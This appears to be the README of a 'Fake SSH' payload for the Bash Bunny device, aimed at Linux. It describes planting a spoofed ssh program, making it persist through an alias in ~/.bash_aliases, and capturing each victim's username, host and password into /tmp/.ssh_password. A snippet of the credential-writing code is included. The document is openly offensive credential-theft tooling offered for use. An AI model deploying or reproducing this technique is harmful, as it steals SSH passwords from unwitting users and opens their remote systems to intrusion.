- Title: Fake SSH
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Phishing
- Copies the "ssh" command spoofing program to the user's home directory.
- Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
- When the user executes the command "ssh" in a terminal, the spoofing program :
- By default retrieves the username@address and password and writes them to "/tmp/.ssh_password".
- But this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
From "payload.txt" change the values of the following constant :
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
From "ssh-phishing.sh" change the values of the following constants if necessary :
From "ssh-phishing.sh", change the payload if you wish :
/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password